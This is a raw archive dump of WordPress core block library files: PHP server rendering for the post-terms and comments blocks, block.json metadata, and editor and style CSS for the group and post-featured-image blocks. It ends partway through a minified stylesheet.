	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classes[] = 'has-link-color';
	}

	$separator = empty( $attributes['separator'] ) ? ' ' : $attributes['separator'];

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) );

	$prefix = "<div $wrapper_attributes>";
	if ( isset( $attributes['prefix'] ) && $attributes['prefix'] ) {
		$prefix .= '<span class="wp-block-post-terms__prefix">' . $attributes['prefix'] . '</span>';
	}

	$suffix = '</div>';
	if ( isset( $attributes['suffix'] ) && $attributes['suffix'] ) {
		$suffix = '<span class="wp-block-post-terms__suffix">' . $attributes['suffix'] . '</span>' . $suffix;
	}

	return get_the_term_list(
		$block->context['postId'],
		$attributes['term'],
		wp_kses_post( $prefix ),
		'<span class="wp-block-post-terms__separator">' . esc_html( $separator ) . '</span>',
		wp_kses_post( $suffix )
	);
}

/**
 * Returns the available variations for the `core/post-terms` block.
 *
 * @since 6.5.0
 *
 * @return array The available variations for the block.
 */
function block_core_post_terms_build_variations() {
	$taxonomies = get_taxonomies(
		array(
			'publicly_queryable' => true,
			'show_in_rest'       => true,
		),
		'objects'
	);

	// Split the available taxonomies to `built_in` and custom ones,
	// in order to prioritize the `built_in` taxonomies at the
	// search results.
	$built_ins         = array();
	$custom_variations = array();

	// Create and register the eligible taxonomies variations.
	foreach ( $taxonomies as $taxonomy ) {
		$variation = array(
			'name'        => $taxonomy->name,
			'title'       => $taxonomy->label,
			'description' => sprintf(
				/* translators: %s: taxonomy's label */
				__( 'Display a list of assigned terms from the taxonomy: %s' ),
				$taxonomy->label
			),
			'attributes'  => array(
				'term' => $taxonomy->name,
			),
			'isActive'    => array( 'term' ),
			'scope'       => array( 'inserter', 'transform' ),
		);
		// Set the category variation as the default one.
		if ( 'category' === $taxonomy->name ) {
			$variation['isDefault'] = true;
		}
		if ( $taxonomy->_builtin ) {
			$built_ins[] = $variation;
		} else {
			$custom_variations[] = $variation;
		}
	}

	return array_merge( $built_ins, $custom_variations );
}

/**
 * Registers the `core/post-terms` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_post_terms() {
	register_block_type_from_metadata(
		__DIR__ . '/post-terms',
		array(
			'render_callback'    => 'render_block_core_post_terms',
			'variation_callback' => 'block_core_post_terms_build_variations',
		)
	);
}
add_action( 'init', 'register_block_core_post_terms' );
group/style-rtl.min.css000060400000000165151330427370011136 0ustar00.wp-block-group{box-sizing:border-box}:where(.wp-block-group.wp-block-group-is-layout-constrained){position:relative}group/editor-rtl.css000060400000003114151330427370010477 0ustar00.wp-block-group .block-editor-block-list__insertion-point{
  left:0;
  right:0;
}

[data-type="core/group"].is-selected .block-list-appender{
  margin-left:0;
  margin-right:0;
}
[data-type="core/group"].is-selected .has-background .block-list-appender{
  margin-bottom:18px;
  margin-top:18px;
}

.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child{
  gap:inherit;
  pointer-events:none;
}
.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-default-block-appender__content,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{
  display:inherit;
  flex:1;
  flex-direction:inherit;
  width:100%;
}
.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after{
  border:1px dashed;
  border-radius:2px;
  content:"";
  display:flex;
  flex:1 0 48px;
  min-height:46px;
  pointer-events:none;
}
.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after:before{
  background:currentColor;
  bottom:0;
  content:"";
  left:0;
  opacity:.1;
  pointer-events:none;
  position:absolute;
  right:0;
  top:0;
}
.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-button-block-appender,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{
  pointer-events:all;
}group/style-rtl.css000060400000000201151330427370010343 0ustar00.wp-block-group{
  box-sizing:border-box;
}

:where(.wp-block-group.wp-block-group-is-layout-constrained){
  position:relative;
}group/block.json000060400000004041151330427370007665 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/group",
	"title": "Group",
	"category": "design",
	"description": "Gather blocks in a layout container.",
	"keywords": [ "container", "wrapper", "row", "section" ],
	"textdomain": "default",
	"attributes": {
		"tagName": {
			"type": "string",
			"default": "div"
		},
		"templateLock": {
			"type": [ "string", "boolean" ],
			"enum": [ "all", "insert", "contentOnly", false ]
		},
		"allowedBlocks": {
			"type": "array"
		}
	},
	"supports": {
		"__experimentalOnEnter": true,
		"__experimentalOnMerge": true,
		"__experimentalSettings": true,
		"align": [ "wide", "full" ],
		"anchor": true,
		"ariaLabel": true,
		"html": false,
		"background": {
			"backgroundImage": true,
			"backgroundSize": true,
			"__experimentalDefaultControls": {
				"backgroundImage": true
			}
		},
		"color": {
			"gradients": true,
			"heading": true,
			"button": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"spacing": {
			"margin": [ "top", "bottom" ],
			"padding": true,
			"blockGap": true,
			"__experimentalDefaultControls": {
				"padding": true,
				"blockGap": true
			}
		},
		"dimensions": {
			"minHeight": true
		},
		"__experimentalBorder": {
			"color": true,
			"radius": true,
			"style": true,
			"width": true,
			"__experimentalDefaultControls": {
				"color": true,
				"radius": true,
				"style": true,
				"width": true
			}
		},
		"position": {
			"sticky": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"layout": {
			"allowSizingOnChildren": true
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-group-editor",
	"style": "wp-block-group"
}
group/theme.css000060400000000103151330427370007507 0ustar00:where(.wp-block-group.has-background){
  padding:1.25em 2.375em;
}group/theme.min.css000060400000000076151330427370010302 0ustar00:where(.wp-block-group.has-background){padding:1.25em 2.375em}group/style.css000060400000000201151330427370007544 0ustar00.wp-block-group{
  box-sizing:border-box;
}

:where(.wp-block-group.wp-block-group-is-layout-constrained){
  position:relative;
}group/style.min.css000060400000000165151330427370010337 0ustar00.wp-block-group{box-sizing:border-box}:where(.wp-block-group.wp-block-group-is-layout-constrained){position:relative}group/theme-rtl.min.css000060400000000076151330427370011101 0ustar00:where(.wp-block-group.has-background){padding:1.25em 2.375em}group/editor.min.css000060400000002734151330427370010471 0ustar00.wp-block-group .block-editor-block-list__insertion-point{left:0;right:0}[data-type="core/group"].is-selected .block-list-appender{margin-left:0;margin-right:0}[data-type="core/group"].is-selected .has-background .block-list-appender{margin-bottom:18px;margin-top:18px}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child{gap:inherit;pointer-events:none}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-default-block-appender__content,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{display:inherit;flex:1;flex-direction:inherit;width:100%}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after{border:1px dashed;border-radius:2px;content:"";display:flex;flex:1 0 48px;min-height:46px;pointer-events:none}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after:before{background:currentColor;bottom:0;content:"";left:0;opacity:.1;pointer-events:none;position:absolute;right:0;top:0}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-button-block-appender,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{pointer-events:all}group/editor.css000060400000003114151330427370007700 0ustar00.wp-block-group .block-editor-block-list__insertion-point{
  left:0;
  right:0;
}

[data-type="core/group"].is-selected .block-list-appender{
  margin-left:0;
  margin-right:0;
}
[data-type="core/group"].is-selected .has-background .block-list-appender{
  margin-bottom:18px;
  margin-top:18px;
}

.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child{
  gap:inherit;
  pointer-events:none;
}
.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-default-block-appender__content,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{
  display:inherit;
  flex:1;
  flex-direction:inherit;
  width:100%;
}
.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after{
  border:1px dashed;
  border-radius:2px;
  content:"";
  display:flex;
  flex:1 0 48px;
  min-height:46px;
  pointer-events:none;
}
.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after:before{
  background:currentColor;
  bottom:0;
  content:"";
  left:0;
  opacity:.1;
  pointer-events:none;
  position:absolute;
  right:0;
  top:0;
}
.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-button-block-appender,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{
  pointer-events:all;
}group/editor-rtl.min.css000060400000002734151330427370011270 0ustar00.wp-block-group .block-editor-block-list__insertion-point{left:0;right:0}[data-type="core/group"].is-selected .block-list-appender{margin-left:0;margin-right:0}[data-type="core/group"].is-selected .has-background .block-list-appender{margin-bottom:18px;margin-top:18px}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child{gap:inherit;pointer-events:none}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-default-block-appender__content,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{display:inherit;flex:1;flex-direction:inherit;width:100%}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after{border:1px dashed;border-radius:2px;content:"";display:flex;flex:1 0 48px;min-height:46px;pointer-events:none}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after:before{background:currentColor;bottom:0;content:"";left:0;opacity:.1;pointer-events:none;position:absolute;right:0;top:0}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-button-block-appender,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{pointer-events:all}group/theme-rtl.css000060400000000103151330427370010306 0ustar00:where(.wp-block-group.has-background){
  padding:1.25em 2.375em;
}comments-pagination-next/block.json000060400000001763151330427370013471 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/comments-pagination-next",
	"title": "Comments Next Page",
	"category": "theme",
	"parent": [ "core/comments-pagination" ],
	"description": "Displays the next comment's page link.",
	"textdomain": "default",
	"attributes": {
		"label": {
			"type": "string"
		}
	},
	"usesContext": [ "postId", "comments/paginationArrow" ],
	"supports": {
		"reusable": false,
		"html": false,
		"color": {
			"gradients": true,
			"text": false,
			"__experimentalDefaultControls": {
				"background": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
comments.php000060400000015157151330427370007114 0ustar00<?php
/**
 * Server-side rendering of the `core/comments` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/comments` block on the server.
 *
 * This render callback is mainly for rendering a dynamic, legacy version of
 * this block (the old `core/post-comments`). It uses the `comments_template()`
 * function to generate the output, in the same way as classic PHP themes.
 *
 * As this callback will always run during SSR, first we need to check whether
 * the block is in legacy mode. If not, the HTML generated in the editor is
 * returned instead.
 *
 * @since 6.1.0
 *
 * @global WP_Post $post Global post object.
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 * @return string Returns the filtered post comments for the current post wrapped inside "p" tags.
 */
function render_block_core_comments( $attributes, $content, $block ) {
	global $post;

	$post_id = $block->context['postId'];
	if ( ! isset( $post_id ) ) {
		return '';
	}

	// Return early if there are no comments and comments are closed.
	if ( ! comments_open( $post_id ) && (int) get_comments_number( $post_id ) === 0 ) {
		return '';
	}

	// If this isn't the legacy block, we need to render the static version of this block.
	$is_legacy = 'core/post-comments' === $block->name || ! empty( $attributes['legacy'] );
	if ( ! $is_legacy ) {
		return $block->render( array( 'dynamic' => false ) );
	}

	$post_before = $post;
	$post        = get_post( $post_id );
	setup_postdata( $post );

	ob_start();

	/*
	 * There's a deprecation warning generated by WP Core.
	 * Ideally this deprecation is removed from Core.
	 * In the meantime, this removes it from the output.
	 */
	add_filter( 'deprecated_file_trigger_error', '__return_false' );
	comments_template();
	remove_filter( 'deprecated_file_trigger_error', '__return_false' );

	$output = ob_get_clean();
	$post   = $post_before;

	$classnames = array();
	// Adds the old class name for styles' backwards compatibility.
	if ( isset( $attributes['legacy'] ) ) {
		$classnames[] = 'wp-block-post-comments';
	}
	if ( isset( $attributes['textAlign'] ) ) {
		$classnames[] = 'has-text-align-' . $attributes['textAlign'];
	}

	$wrapper_attributes = get_block_wrapper_attributes(
		array( 'class' => implode( ' ', $classnames ) )
	);

	/*
	 * Enqueues scripts and styles required only for the legacy version. That is
	 * why they are not defined in `block.json`.
	 */
	wp_enqueue_script( 'comment-reply' );
	enqueue_legacy_post_comments_block_styles( $block->name );

	return sprintf( '<div %1$s>%2$s</div>', $wrapper_attributes, $output );
}

/**
 * Registers the `core/comments` block on the server.
 *
 * @since 6.1.0
 */
function register_block_core_comments() {
	register_block_type_from_metadata(
		__DIR__ . '/comments',
		array(
			'render_callback'   => 'render_block_core_comments',
			'skip_inner_blocks' => true,
		)
	);
}
add_action( 'init', 'register_block_core_comments' );

/**
 * Use the button block classes for the form-submit button.
 *
 * @since 6.1.0
 *
 * @param array $fields The default comment form arguments.
 *
 * @return array Returns the modified fields.
 */
function comments_block_form_defaults( $fields ) {
	if ( wp_is_block_theme() ) {
		$fields['submit_button'] = '<input name="%1$s" type="submit" id="%2$s" class="%3$s wp-block-button__link ' . wp_theme_get_element_class_name( 'button' ) . '" value="%4$s" />';
		$fields['submit_field']  = '<p class="form-submit wp-block-button">%1$s %2$s</p>';
	}

	return $fields;
}
add_filter( 'comment_form_defaults', 'comments_block_form_defaults' );

/**
 * Enqueues styles from the legacy `core/post-comments` block. These styles are
 * required only by the block's fallback.
 *
 * @since 6.1.0
 *
 * @param string $block_name Name of the new block type.
 */
function enqueue_legacy_post_comments_block_styles( $block_name ) {
	static $are_styles_enqueued = false;

	if ( ! $are_styles_enqueued ) {
		$handles = array(
			'wp-block-post-comments',
			'wp-block-buttons',
			'wp-block-button',
		);
		foreach ( $handles as $handle ) {
			wp_enqueue_block_style( $block_name, array( 'handle' => $handle ) );
		}
		$are_styles_enqueued = true;
	}
}

/**
 * Ensures backwards compatibility for any users running the Gutenberg plugin
 * who have used Post Comments before it was merged into Comments Query Loop.
 *
 * The same approach was followed when core/query-loop was renamed to
 * core/post-template.
 *
 * @since 6.1.0
 *
 * @see https://github.com/WordPress/gutenberg/pull/41807
 * @see https://github.com/WordPress/gutenberg/pull/32514
 */
function register_legacy_post_comments_block() {
	$registry = WP_Block_Type_Registry::get_instance();

	/*
	 * Remove the old `post-comments` block if it was already registered, as it
	 * is about to be replaced by the type defined below.
	 */
	if ( $registry->is_registered( 'core/post-comments' ) ) {
		unregister_block_type( 'core/post-comments' );
	}

	// Recreate the legacy block metadata.
	$metadata = array(
		'name'              => 'core/post-comments',
		'category'          => 'theme',
		'attributes'        => array(
			'textAlign' => array(
				'type' => 'string',
			),
		),
		'uses_context'      => array(
			'postId',
			'postType',
		),
		'supports'          => array(
			'html'       => false,
			'align'      => array( 'wide', 'full' ),
			'typography' => array(
				'fontSize'                      => true,
				'lineHeight'                    => true,
				'__experimentalFontStyle'       => true,
				'__experimentalFontWeight'      => true,
				'__experimentalLetterSpacing'   => true,
				'__experimentalTextTransform'   => true,
				'__experimentalDefaultControls' => array(
					'fontSize' => true,
				),
			),
			'color'      => array(
				'gradients'                     => true,
				'link'                          => true,
				'__experimentalDefaultControls' => array(
					'background' => true,
					'text'       => true,
				),
			),
			'inserter'   => false,
		),
		'style'             => array(
			'wp-block-post-comments',
			'wp-block-buttons',
			'wp-block-button',
		),
		'render_callback'   => 'render_block_core_comments',
		'skip_inner_blocks' => true,
	);

	/*
	 * Filters the metadata object, the same way it's done inside
	 * `register_block_type_from_metadata()`. This applies some default filters,
	 * like `_wp_multiple_block_styles`, which is required in this case because
	 * the block has multiple styles.
	 */
	/** This filter is documented in wp-includes/blocks.php */
	$metadata = apply_filters( 'block_type_metadata', $metadata );

	register_block_type( 'core/post-comments', $metadata );
}
add_action( 'init', 'register_legacy_post_comments_block', 21 );
post-featured-image/editor.css000060400000011677151330427370012423 0ustar00.wp-block-post-featured-image .block-editor-media-placeholder{
  -webkit-backdrop-filter:none;
          backdrop-filter:none;
  z-index:1;
}
.wp-block-post-featured-image .components-placeholder,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder{
  align-items:center;
  display:flex;
  justify-content:center;
  min-height:200px;
  padding:0;
}
.wp-block-post-featured-image .components-placeholder .components-form-file-upload,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-form-file-upload{
  display:none;
}
.wp-block-post-featured-image .components-placeholder .components-button,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button{
  align-items:center;
  background:var(--wp-admin-theme-color);
  border-color:var(--wp-admin-theme-color);
  border-radius:50%;
  border-style:solid;
  color:#fff;
  display:flex;
  height:48px;
  justify-content:center;
  margin:auto;
  padding:0;
  position:relative;
  width:48px;
}
.wp-block-post-featured-image .components-placeholder .components-button>svg,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button>svg{
  color:inherit;
}
.wp-block-post-featured-image .components-placeholder:where(.has-border-color),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where(.has-border-color),.wp-block-post-featured-image img:where(.has-border-color){
  border-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-top-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-color]),.wp-block-post-featured-image img:where([style*=border-top-color]){
  border-top-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-right-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-color]),.wp-block-post-featured-image img:where([style*=border-right-color]){
  border-right-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image img:where([style*=border-bottom-color]){
  border-bottom-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-left-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-color]),.wp-block-post-featured-image img:where([style*=border-left-color]){
  border-left-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-width]),.wp-block-post-featured-image img:where([style*=border-width]){
  border-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-top-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-width]),.wp-block-post-featured-image img:where([style*=border-top-width]){
  border-top-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-right-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-width]),.wp-block-post-featured-image img:where([style*=border-right-width]){
  border-right-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image img:where([style*=border-bottom-width]){
  border-bottom-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-left-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-width]),.wp-block-post-featured-image img:where([style*=border-left-width]){
  border-left-style:solid;
}
.wp-block-post-featured-image[style*=height] .components-placeholder{
  height:100%;
  min-height:48px;
  min-width:48px;
  width:100%;
}
.wp-block-post-featured-image>a{
  cursor:default;
}
.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-button,.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-placeholder__instructions,.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-placeholder__label{
  opacity:1;
  pointer-events:auto;
}
.wp-block-post-featured-image.is-transient{
  position:relative;
}
.wp-block-post-featured-image.is-transient img{
  opacity:.3;
}
.wp-block-post-featured-image.is-transient .components-spinner{
  left:50%;
  position:absolute;
  top:50%;
  transform:translate(-50%, -50%);
}

div[data-type="core/post-featured-image"] img{
  display:block;
  height:auto;
  max-width:100%;
}post-featured-image/editor.min.css000060400000011341151330427370013171 0ustar00.wp-block-post-featured-image .block-editor-media-placeholder{-webkit-backdrop-filter:none;backdrop-filter:none;z-index:1}.wp-block-post-featured-image .components-placeholder,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder{align-items:center;display:flex;justify-content:center;min-height:200px;padding:0}.wp-block-post-featured-image .components-placeholder .components-form-file-upload,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-form-file-upload{display:none}.wp-block-post-featured-image .components-placeholder .components-button,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button{align-items:center;background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color);border-radius:50%;border-style:solid;color:#fff;display:flex;height:48px;justify-content:center;margin:auto;padding:0;position:relative;width:48px}.wp-block-post-featured-image .components-placeholder .components-button>svg,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button>svg{color:inherit}.wp-block-post-featured-image .components-placeholder:where(.has-border-color),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where(.has-border-color),.wp-block-post-featured-image img:where(.has-border-color){border-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-top-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-color]),.wp-block-post-featured-image img:where([style*=border-top-color]){border-top-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-right-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-color]),.wp-block-post-featured-image img:where([style*=border-right-color]){border-right-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image img:where([style*=border-bottom-color]){border-bottom-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-left-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-color]),.wp-block-post-featured-image img:where([style*=border-left-color]){border-left-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-width]),.wp-block-post-featured-image img:where([style*=border-width]){border-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-top-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-width]),.wp-block-post-featured-image img:where([style*=border-top-width]){border-top-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-right-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-width]),.wp-block-post-featured-image img:where([style*=border-right-width]){border-right-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image img:where([style*=border-bottom-width]){border-bottom-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-left-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-width]),.wp-block-post-featured-image img:where([style*=border-left-width]){border-left-style:solid}.wp-block-post-featured-image[style*=height] .components-placeholder{height:100%;min-height:48px;min-width:48px;width:100%}.wp-block-post-featured-image>a{cursor:default}.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-button,.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-placeholder__instructions,.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-placeholder__label{opacity:1;pointer-events:auto}.wp-block-post-featured-image.is-transient{position:relative}.wp-block-post-featured-image.is-transient img{opacity:.3}.wp-block-post-featured-image.is-transient .components-spinner{left:50%;position:absolute;top:50%;transform:translate(-50%,-50%)}div[data-type="core/post-featured-image"] img{display:block;height:auto;max-width:100%}post-featured-image/style-rtl.min.css000060400000003441151330427370013644 0ustar00.wp-block-post-featured-image{margin-left:0;margin-right:0}.wp-block-post-featured-image a{display:block;height:100%}.wp-block-post-featured-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom;width:100%}.wp-block-post-featured-image.alignfull img,.wp-block-post-featured-image.alignwide img{width:100%}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim{background-color:#000;inset:0;position:absolute}.wp-block-post-featured-image{position:relative}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-gradient{background-color:initial}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-0{opacity:0}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-10{opacity:.1}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-20{opacity:.2}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-30{opacity:.3}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-40{opacity:.4}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-50{opacity:.5}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-60{opacity:.6}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-70{opacity:.7}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-80{opacity:.8}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-90{opacity:.9}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-100{opacity:1}.wp-block-post-featured-image:where(.alignleft,.alignright){width:100%}post-featured-image/editor-rtl.min.css000060400000011341151330427370013770 0ustar00.wp-block-post-featured-image .block-editor-media-placeholder{-webkit-backdrop-filter:none;backdrop-filter:none;z-index:1}.wp-block-post-featured-image .components-placeholder,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder{align-items:center;display:flex;justify-content:center;min-height:200px;padding:0}.wp-block-post-featured-image .components-placeholder .components-form-file-upload,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-form-file-upload{display:none}.wp-block-post-featured-image .components-placeholder .components-button,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button{align-items:center;background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color);border-radius:50%;border-style:solid;color:#fff;display:flex;height:48px;justify-content:center;margin:auto;padding:0;position:relative;width:48px}.wp-block-post-featured-image .components-placeholder .components-button>svg,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button>svg{color:inherit}.wp-block-post-featured-image .components-placeholder:where(.has-border-color),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where(.has-border-color),.wp-block-post-featured-image img:where(.has-border-color){border-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-top-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-color]),.wp-block-post-featured-image img:where([style*=border-top-color]){border-top-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-right-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-color]),.wp-block-post-featured-image img:where([style*=border-right-color]){border-left-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image img:where([style*=border-bottom-color]){border-bottom-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-left-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-color]),.wp-block-post-featured-image img:where([style*=border-left-color]){border-right-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-width]),.wp-block-post-featured-image img:where([style*=border-width]){border-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-top-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-width]),.wp-block-post-featured-image img:where([style*=border-top-width]){border-top-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-right-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-width]),.wp-block-post-featured-image img:where([style*=border-right-width]){border-left-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image img:where([style*=border-bottom-width]){border-bottom-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-left-width]),.wp-block-post-featured-image 